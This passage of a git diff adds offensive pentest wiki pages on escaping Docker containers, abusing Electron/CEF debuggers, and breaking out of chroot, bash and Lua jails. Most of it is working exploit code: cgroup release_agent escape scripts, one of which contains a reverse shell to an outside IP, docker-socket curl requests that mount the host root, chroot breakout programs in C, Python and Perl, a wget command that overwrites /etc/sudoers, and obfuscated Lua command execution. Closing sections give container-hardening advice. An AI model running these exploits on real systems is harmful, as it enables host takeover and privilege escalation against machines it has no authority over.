+root 1 0 0 11:25 ? 00:00:01 /sbin/init +root 2 0 0 11:25 ? 00:00:00 [kthreadd] +root 3 2 0 11:25 ? 00:00:00 [rcu_gp] +root 4 2 0 11:25 ? 00:00:00 [rcu_par_gp] +root 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events] +root 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd] +root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] +root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] +... +``` + +## Runc exploit \(CVE-2019-5736\) + +In case you can execute `docker exec` as root \(probably with sudo\), you try to escalate privileges escaping from a container abusing CVE-2019-5736 \(exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)\). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload. + +Change the payload accordingly and build the main.go with `go build main.go`. The resulting binary should be placed in the docker container for execution. +Upon execution, as soon as it displays `[+] Overwritten /bin/sh successfully` you need to execute the following from the host machine: + +`docker exec -it /bin/sh` + +This will trigger the payload which is present in the main.go file. + +For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) + +## Docker API Firewall Bypass + +In some occasions, the sysadmin may install some plugins to docker to avoid low privilege users to interact with docker without being able to escalate privileges. + +### disallowed `run --privileged` + +In this case the sysadmin **disallowed users to mount volumes and run containers with the `--privileged` flag** or give any extra capability to the container: + +```bash +docker run -d --privileged modified-ubuntu +docker: Error response from daemon: authorization denied by plugin customauth: [DOCKER FIREWALL] Specified Privileged option value is Disallowed. +See 'docker run --help'. +``` + +However, a user can **create a shell inside the running container and give it the extra privileges**: + +```bash +docker run -d --security-opt "seccomp=unconfined" ubuntu +#bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de +docker exec -it --privileged bb72293810b0f4ea65ee8fd200db418a48593c1a8a31407be6fee0f9f3e4f1de bash +``` + +Now, the user can escape from the container using any of the previously discussed techniques and escalate privileges inside the host. + +### Mount Writable Folder + +In this case the sysadmin **disallowed users to run containers with the `--privileged` flag** or give any extra capability to the container, and he only allowed to mount the `/tmp` folder: + +```bash +host> cp /bin/bash /tmp #Cerate a copy of bash +host> docker run -it -v /tmp:/host ubuntu:18.04 bash #Mount the /tmp folder of the host and get a shell +docker container> chown root:root /host/bash +docker container> chmod u+s /host/bash +host> /tmp/bash + -p #This will give you a shell as root +``` + +{% hint style="info" %} +Note that maybe you cannot mount the folder `/tmp` but you can mount a **different writable folder**. You can find writable directories using: `find / -writable -type d 2>/dev/null` + +**Note that not all the directories in a linux machine will support the suid bit!** In order to check which directories support the suid bit run `mount | grep -v "nosuid"` For example usually `/dev/shm` , `/run` , `/proc` , `/sys/fs/cgroup` and `/var/lib/lxcfs` don't support the suid bit. + +Note also that if you can **mount `/etc`** or any other folder **containing configuration files**, you may change them from the docker container as root in order to **abuse them in the host** and escalate privileges \(maybe modifying `/etc/shadow`\) +{% endhint %} + +### Unchecked JSON Structure + +It's possible that when the sysadmin configured the docker firewall he **forgot about some important parameter** of the API \([https://docs.docker.com/engine/api/v1.40/\#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)\) like "**Binds**". +In the following example it's possible to abuse this misconfiguration to create and run a container that mounts the root \(/\) folder of the host: + +```bash +docker version #First, find the API version of docker, 1.40 in this example +docker images #List the images available +#Then, a container that mounts the root folder of the host +curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "Binds":["/:/host"]}' http:/v1.40/containers/create +docker start f6932bc153ad #Start the created privileged container +docker exec -it f6932bc153ad chroot /host bash #Get a shell inside of it +#You can access the host filesystem +``` + +### Unchecked JSON Attribute + +It's possible that when the sysadmin configured the docker firewall he **forgot about some important attribute of a parametter** of the API \([https://docs.docker.com/engine/api/v1.40/\#operation/ContainerList](https://docs.docker.com/engine/api/v1.40/#operation/ContainerList)\) like "**Capabilities**" inside "**HostConfig**". In the following example it's possible to abuse this misconfiguration to create and run a container with the **SYS\_MODULE** capability: + +```bash +docker version +curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json" -d '{"Image": "ubuntu", "HostConfig":{"Capabilities":["CAP_SYS_MODULE"]}}' http:/v1.40/containers/create +docker start c52a77629a9112450f3dedd1ad94ded17db61244c4249bdfbd6bb3d581f470fa +docker ps +docker exec -it c52a77629a91 bash +capsh --print +#You can abuse the SYS_MODULE capability +``` + +## Writable hostPath Mount + +\(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)\) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: + +```bash +#### Check if You Can Write to a File-system +$ echo 1 > /proc/sysrq-trigger + +#### Check root UUID +$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem +$ findfs UUID=/dev/sda1- Attempt to Mount the Host's Filesystem +$ mkdir /mnt-test +$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now. + +#### debugfs (Interactive File System Debugger) +$ debugfs /dev/sda1 +``` + +## Containers Security Improvements + +### Seccomp in Docker + +This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: + +{% page-ref page="seccomp.md" %} + +### AppArmor in Docker + +This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker: + +{% page-ref page="apparmor.md" %} + +### gVisor + +**gVisor** is an application kernel, written in Go, that implements a substantial portion of the Linux system surface. It includes an [Open Container Initiative \(OCI\)](https://www.opencontainers.org/) runtime called `runsc` that provides an **isolation boundary between the application and the host kernel**. The `runsc` runtime integrates with Docker and Kubernetes, making it simple to run sandboxed containers. + +{% embed url="https://github.com/google/gvisor" %} + +## Kata Containers + +**Kata Containers** is an open source community working to build a secure container runtime with lightweight virtual machines that feel and perform like containers, but provide **stronger workload isolation using hardware virtualization** technology as a second layer of defense. + +{% embed url="https://katacontainers.io/" %} + +### Use containers securely + +Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary. + +To help keep containers secure: + +* Do not use the `--privileged` flag or mount a [Docker socket inside the container](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/). The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. +* Do not run as root inside the container. Use a [different user](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) or [user namespaces](https://docs.docker.com/engine/security/userns-remap/). The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. +* [Drop all capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) \(`--cap-drop=all`\) and enable only those that are required \(`--cap-add=...`\). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. +* [Use the “no-new-privileges” security option](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. +* [Limit resources available to the container](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources). Resource limits can protect the machine from denial of service attacks. +* Adjust [seccomp](https://docs.docker.com/engine/security/seccomp/), [AppArmor](https://docs.docker.com/engine/security/apparmor/) \(or SELinux\) profiles to restrict the actions and syscalls available for the container to the minimum required. +* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. +* Regularly rebuild your images to apply security patches. This goes without saying. + +## References + +* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/_fel1x/status/1151487051986087936) +* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) + diff --git a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md new file mode 100644 index 00000000000..1295d76a0ba --- /dev/null +++ b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -0,0 +1,33 @@ +# electron/CEF/chromium debugger abuse + +If you find any process with **electron, cef or chromium debugger running** and listening to a port you should try to make the **debugger execute arbitrary commands**. +Abusing this behaviour you **could be able to escalate privileges**. + +The abuse of this vulnerability remotely could be as easy as injecting via XSS this line of JS: + +```markup + +``` + +But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)\*\*\*\* + +```bash +#List possible vulnerable sockets +./cefdebug.exe +#Check if possibly vulnerable +./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.version" +#Exploit it +./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')" +``` + +List of resources to pwn electorn apps: [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) + +## References + +* [https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc&t=6345s) +* [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug) +* [https://iwantmore.pizza/posts/cve-2019-1414.html](https://iwantmore.pizza/posts/cve-2019-1414.html) +* [https://bugs.chromium.org/p/project-zero/issues/detail?id=773](https://bugs.chromium.org/p/project-zero/issues/detail?id=773) +* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1742](https://bugs.chromium.org/p/project-zero/issues/detail?id=1742) +* [https://bugs.chromium.org/p/project-zero/issues/detail?id=1944](https://bugs.chromium.org/p/project-zero/issues/detail?id=1944) + diff --git a/linux-unix/privilege-escalation/escaping-from-a-docker-container.md b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md new file mode 100644 index 00000000000..ea35949223e --- /dev/null +++ b/linux-unix/privilege-escalation/escaping-from-a-docker-container.md @@ -0,0 +1,351 @@ +# Escaping from a Docker container + +## `--privileged` flag + +{% code title="Initial PoC" %} +```bash +# spawn a new container to exploit via: +# docker run --rm -it --privileged ubuntu bash + +d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` +mkdir -p $d/w;echo 1 >$d/w/notify_on_release +t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +touch /o; +echo $t/c >$d/release_agent; +echo "#!/bin/sh $1 >$t/o" >/c; +chmod +x /c; +sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o +``` +{% endcode %} + +{% code title="Second PoC" %} +```bash +# On the host +docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash + +# In the container +mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x + +echo 1 > /tmp/cgrp/x/notify_on_release +host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +echo "$host_path/cmd" > /tmp/cgrp/release_agent + +#For a normal PoC ================= +echo '#!/bin/sh' > /cmd +echo "ps aux > $host_path/output" >> /cmd +chmod a+x /cmd +#=================================== +#Reverse shell +echo '#!/bin/bash' > /cmd +echo "bash -i >& /dev/tcp/10.10.14.21/9000 0>&1" >> /cmd +chmod a+x /cmd +#=================================== + +sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +head /output +``` +{% endcode %} + + The `--privileged` flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities. + +In fact, `--privileged` provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are: + +1. We must be running as root inside the container +2. The container must be run with the `SYS_ADMIN` Linux capability +3. The container must lack an AppArmor profile, or otherwise allow the `mount` syscall +4. The cgroup v1 virtual filesystem must be mounted read-write inside the container + +The `SYS_ADMIN` capability allows a container to perform the mount syscall \(see [man 7 capabilities](https://linux.die.net/man/7/capabilities)\). [Docker starts containers with a restricted set of capabilities](https://docs.docker.com/engine/security/security/#linux-kernel-capabilities) by default and does not enable the `SYS_ADMIN` capability due to the security risks of doing so. + +Further, Docker [starts containers with the `docker-default` AppArmor](https://docs.docker.com/engine/security/apparmor/#understand-the-policies) policy by default, which [prevents the use of the mount syscall](https://github.com/docker/docker-ce/blob/v18.09.8/components/engine/profiles/apparmor/template.go#L35) even when the container is run with `SYS_ADMIN`. + +A container would be vulnerable to this technique if run with the flags: `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` + +### Breaking down the proof of concept + +Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works. + +To trigger this exploit we need a cgroup where we can create a `release_agent` file and trigger `release_agent` invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup. + +To do that, we create a `/tmp/cgrp` directory, mount the [RDMA](https://www.kernel.org/doc/Documentation/cgroup-v1/rdma.txt) cgroup controller and create a child cgroup \(named “x” for the purposes of this example\). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers. + +If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change `rdma` to `memory` to fix it. We’re using RDMA because the original PoC was only designed to work with it. + +Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another. + +We can see the “x” child cgroup creation and its directory listing below. + +```text +root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x +root@b11cf9eab4fd:/# ls /tmp/cgrp/ +cgroup.clone_children cgroup.procs cgroup.sane_behavior notify_on_release release_agent tasks x +root@b11cf9eab4fd:/# ls /tmp/cgrp/x +cgroup.clone_children cgroup.procs notify_on_release rdma.current rdma.max tasks +``` + +Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its `notify_on_release` file. We also set the RDMA cgroup release agent to execute a `/cmd` script — which we will later create in the container — by writing the `/cmd` script path on the host to the `release_agent` file. To do it, we’ll grab the container’s path on the host from the `/etc/mtab` file. + +The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host. + +Those operations can be seen below: + +```text +root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release +root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` +root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent +``` + +Note the path to the `/cmd` script, which we are going to create on the host: + +```text +root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent +/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd +``` + +Now, we create the `/cmd` script such that it will execute the `ps aux` command and save its output into `/output` on the container by specifying the full path of the output file on the host. At the end, we also print the `/cmd` script to see its contents: + +```text +root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd +root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd +root@b11cf9eab4fd:/# chmod a+x /cmd +root@b11cf9eab4fd:/# cat /cmd +#!/bin/sh +ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output +``` + +Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a `/bin/sh` process and writing its PID to the `cgroup.procs` file in “x” child cgroup directory, the script on the host will execute after `/bin/sh` exits. The output of `ps aux` performed on the host is then saved to the `/output` file inside the container: + +```text +root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" +root@b11cf9eab4fd:/# head /output +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND +root 1 0.1 1.0 17564 10288 ? Ss 13:57 0:01 /sbin/init +root 2 0.0 0.0 0 0 ? S 13:57 0:00 [kthreadd] +root 3 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_gp] +root 4 0.0 0.0 0 0 ? I< 13:57 0:00 [rcu_par_gp] +root 6 0.0 0.0 0 0 ? I< 13:57 0:00 [kworker/0:0H-kblockd] +root 8 0.0 0.0 0 0 ? I< 13:57 0:00 [mm_percpu_wq] +root 9 0.0 0.0 0 0 ? S 13:57 0:00 [ksoftirqd/0] +root 10 0.0 0.0 0 0 ? I 13:57 0:00 [rcu_sched] +root 11 0.0 0.0 0 0 ? S 13:57 0:00 [migration/0] +``` + +## `--privileged` flag v2 + +The previous PoCs work fine when the container is configured with a storage-driver which exposes the full host path of the mount point, for example `overlayfs`, however I recently came across a couple of configurations which did not obviously disclose the host file system mount point. + +### Kata Containers + +```text +root@container:~$ head -1 /etc/mtab +kataShared on / type 9p (rw,dirsync,nodev,relatime,mmap,access=client,trans=virtio) +``` + +[Kata Containers](https://katacontainers.io/) by default mounts the root fs of a container over `9pfs`. This discloses no information about the location of the container file system in the Kata Containers Virtual Machine. + +\* More on Kata Containers in a future blog post. + +### Device Mapper + +```text +root@container:~$ head -1 /etc/mtab +/dev/sdc / ext4 rw,relatime,stripe=384 0 0 +``` + +I saw a container with this root mount in a live environment, I believe the container was running with a specific `devicemapper` storage-driver configuration, but at this point I have been unable to replicate this behaviour in a test environment. + +### An Alternative PoC + +Obviously in these cases there is not enough information to identify the path of container files on the host file system, so Felix’s PoC cannot be used as is. However, we can still execute this attack with a little ingenuity. + +The one key piece of information required is the full path, relative to the container host, of a file to execute within the container. Without being able to discern this from mount points within the container we have to look elsewhere. + +#### Proc to the Rescue + +The Linux `/proc` pseudo-filesystem exposes kernel process data structures for all processes running on a system, including those running in different namespaces, for example within a container. This can be shown by running a command in a container and accessing the `/proc` directory of the process on the host:Container + +```bash +root@container:~$ sleep 100 +``` + +```bash +root@host:~$ ps -eaf | grep sleep +root 28936 28909 0 10:11 pts/0 00:00:00 sleep 100 +root@host:~$ ls -la /proc/`pidof sleep` +total 0 +dr-xr-xr-x 9 root root 0 Nov 19 10:03 . +dr-xr-xr-x 430 root root 0 Nov 9 15:41 .. +dr-xr-xr-x 2 root root 0 Nov 19 10:04 attr +-rw-r--r-- 1 root root 0 Nov 19 10:04 autogroup +-r-------- 1 root root 0 Nov 19 10:04 auxv +-r--r--r-- 1 root root 0 Nov 19 10:03 cgroup +--w------- 1 root root 0 Nov 19 10:04 clear_refs +-r--r--r-- 1 root root 0 Nov 19 10:04 cmdline +... +-rw-r--r-- 1 root root 0 Nov 19 10:29 projid_map +lrwxrwxrwx 1 root root 0 Nov 19 10:29 root -> / +-rw-r--r-- 1 root root 0 Nov 19 10:29 sched +... +``` + +_As an aside, the `/proc//root` data structure is one that confused me for a very long time, I could never understand why having a symbolic link to `/` was useful, until I read the actual definition in the man pages:_ + +> /proc/\[pid\]/root +> +> UNIX and Linux support the idea of a per-process root of the filesystem, set by the chroot\(2\) system call. This file is a symbolic link that points to the process’s root directory, and behaves in the same way as exe, and fd/\*. +> +> Note however that this file is not merely a symbolic link. It provides the same view of the filesystem \(including namespaces and the set of per-process mounts\) as the process itself. + +The `/proc//root` symbolic link can be used as a host relative path to any file within a container:Container + +```bash +root@container:~$ echo findme > /findme +root@container:~$ sleep 100 +``` + +```bash +root@host:~$ cat /proc/`pidof sleep`/root/findme +findme +``` + +This changes the requirement for the attack from knowing the full path, relative to the container host, of a file within the container, to knowing the pid of _any_ process running in the container. + +#### Pid Bashing + +This is actually the easy part, process ids in Linux are numerical and assigned sequentially. The `init` process is assigned process id `1` and all subsequent processes are assigned incremental ids. To identify the host process id of a process within a container, a brute force incremental search can be used:Container + +```text +root@container:~$ echo findme > /findme +root@container:~$ sleep 100 +``` + +Host + +```bash +root@host:~$ COUNTER=1 +root@host:~$ while [ ! -f /proc/${COUNTER}/root/findme ]; do COUNTER=$((${COUNTER} + 1)); done +root@host:~$ echo ${COUNTER} +7822 +root@host:~$ cat /proc/${COUNTER}/root/findme +findme +``` + +#### Putting it All Together + +To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created. + +The only caveat with this technique is it is in no way shape or form subtle, and can increase the pid count very high. As no long running processes are kept running this _should_ not cause reliability issues, but don’t quote me on that. + +The below PoC implements these techniques to provide a more generic attack than first presented in Felix’s original PoC for escaping a privileged container using the cgroups `release_agent` functionality: + +```bash +#!/bin/sh + +OUTPUT_DIR="/" +MAX_PID=65535 +CGROUP_NAME="xyx" +CGROUP_MOUNT="/tmp/cgrp" +PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" +PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" +OUTPUT_NAME="${CGROUP_NAME}_payload.out" +OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" + +# Run a process for which we can search for (not needed in reality, but nice to have) +sleep 10000 & + +# Prepare the payload script to execute on the host +cat > ${PAYLOAD_PATH} << __EOF__ +#!/bin/sh + +OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} + +# Commands to run on the host< +ps -eaf > \${OUTPATH} 2>&1 +__EOF__ + +# Make the payload script executable +chmod a+x ${PAYLOAD_PATH} + +# Set up the cgroup mount using the memory resource cgroup controller +mkdir ${CGROUP_MOUNT} +mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} +mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} +echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release + +# Brute force the host pid until the output path is created, or we run out of guesses +TPID=1 +while [ ! -f ${OUTPUT_PATH} ] +do + if [ $((${TPID} % 100)) -eq 0 ] + then + echo "Checking pid ${TPID}" + if [ ${TPID} -gt ${MAX_PID} ] + then + echo "Exiting at ${MAX_PID} :-(" + exit 1 + fi + fi + # Set the release_agent path to the guessed pid + echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent + # Trigger execution of the release_agent + sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" + TPID=$((${TPID} + 1)) +done + +# Wait for and cat the output +sleep 1 +echo "Done! Output:" +cat ${OUTPUT_PATH} +``` + +Executing the PoC within a privileged container should provide output similar to: + +```bash +root@container:~$ ./release_agent_pid_brute.sh +Checking pid 100 +Checking pid 200 +Checking pid 300 +Checking pid 400 +Checking pid 500 +Checking pid 600 +Checking pid 700 +Checking pid 800 +Checking pid 900 +Checking pid 1000 +Checking pid 1100 +Checking pid 1200 + +Done! Output: +UID PID PPID C STIME TTY TIME CMD +root 1 0 0 11:25 ? 00:00:01 /sbin/init +root 2 0 0 11:25 ? 00:00:00 [kthreadd] +root 3 2 0 11:25 ? 00:00:00 [rcu_gp] +root 4 2 0 11:25 ? 00:00:00 [rcu_par_gp] +root 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events] +root 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd] +root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] +root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] +... +``` + +## Use containers securely + +Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary. + +To help keep containers secure: + +* Do not use the `--privileged` flag or mount a [Docker socket inside the container](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/). The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. +* Do not run as root inside the container. Use a [different user](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) or [user namespaces](https://docs.docker.com/engine/security/userns-remap/). The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. +* [Drop all capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) \(`--cap-drop=all`\) and enable only those that are required \(`--cap-add=...`\). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. +* [Use the “no-new-privileges” security option](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. +* [Limit resources available to the container](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources). Resource limits can protect the machine from denial of service attacks. +* Adjust [seccomp](https://docs.docker.com/engine/security/seccomp/), [AppArmor](https://docs.docker.com/engine/security/apparmor/) \(or SELinux\) profiles to restrict the actions and syscalls available for the container to the minimum required. +* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. +* Regularly rebuild your images to apply security patches. This goes without saying. + +## References + +* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) +* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/_fel1x/status/1151487051986087936) +* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) + diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md new file mode 100644 index 00000000000..16cde412496 --- /dev/null +++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md @@ -0,0 +1,184 @@ +# Escaping from Jails + +## **GTFOBins** + +**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io/) **if you can execute any binary with "Shell" property** + +## Chroot limitation + +From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** \(**root**\) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**. + +Therefore, if you are **root** inside a chroot you **can escape** creating **another chroot**. However, in several cases inside the first chroot you won't be able to execute the chroot command, therefore you will need to compile a binary like the following one and run it: + +{% code title="break\_chroot.c" %} +```c +#include +#include +#include + +//gcc break_chroot.c -o break_chroot + +int main(void) +{ + mkdir("chroot-dir", 0755); + chroot("chroot-dir"); + for(int i = 0; i < 1000; i++) { + chdir(".."); + } + chroot("."); + system("/bin/bash"); +} +``` +{% endcode %} + +Using **python**: + +```python +#!/usr/bin/python +import os +os.mkdir("chroot-dir") +os.chroot("chroot-dir") +for i in range(1000): + os.chdir("..") +os.chroot(".") +os.system("/bin/bash") +``` + +Using **perl**: + +```perl +#!/usr/bin/perl +mkdir "chroot-dir"; +chroot "chroot-dir"; +foreach my $i (0..1000) { + chdir ".." +} +chroot "."; +system("/bin/bash"); +``` + +## Bash Jails + +### Enumeration + +Get info about the jail: + +```bash +echo $SHELL +echo $PATH +env +export +pwd +``` + +### Modify PATH + +Check if you can modify the PATH env variable + +```bash +echo $PATH #See the path of the executables that you can use +PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path +echo /home/* #List directory +``` + +### Using vim + +```bash +:set shell=/bin/sh +:shell +``` + +### Create script + +Check if you can create an executable file with _/bin/bash_ as content + +```bash +red /bin/bash +> w wx/path #Write /bin/bash in a writable and executable path +``` + +### Get bash from SSH + +If you are accessing via ssh you can use this trick to execute a bash shell: + +```bash +ssh -t user@ bash # Get directly an interactive shell +ssh user@ -t "bash --noprofile -i" +ssh user@ -t "() { :; }; sh -i " +``` + +### Declare + +```bash +declare -n PATH; export PATH=/bin;bash -i + +BASH_CMDS[shell]=/bin/bash;shell -i +``` + +### Wget + +You can overwrite for example sudoers file + +```bash +wget http://127.0.0.1:8080/sudoers -O /etc/sudoers +``` + +### Other tricks + +[**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/) +[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]%28https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells) +[https://gtfobins.github.io](https://gtfobins.github.io**]%28https://gtfobins.github.io) +**It could also be interesting the page:** + +{% page-ref page="../useful-linux-commands/bypass-bash-restrictions.md" %} + +## Python Jails + +Tricks about escaping from python jails in the following page: + +{% page-ref page="../../misc/basic-python/bypass-python-sandboxes.md" %} + +## Lua Jails + +In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua_base) + +**Eval** with command execution**:** + +```bash +load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))() +``` + +Some tricks to **call functions of a library without using dots**: + +```bash +print(string.char(0x41, 0x42)) +print(rawget(string, "char")(0x41, 0x42)) +``` + +Enumerate functions of a library: + +```bash +for k,v in pairs(string) do print(k,v) end +``` + +Note that every time you execute the previous one liner in a **different lua environment the order of the 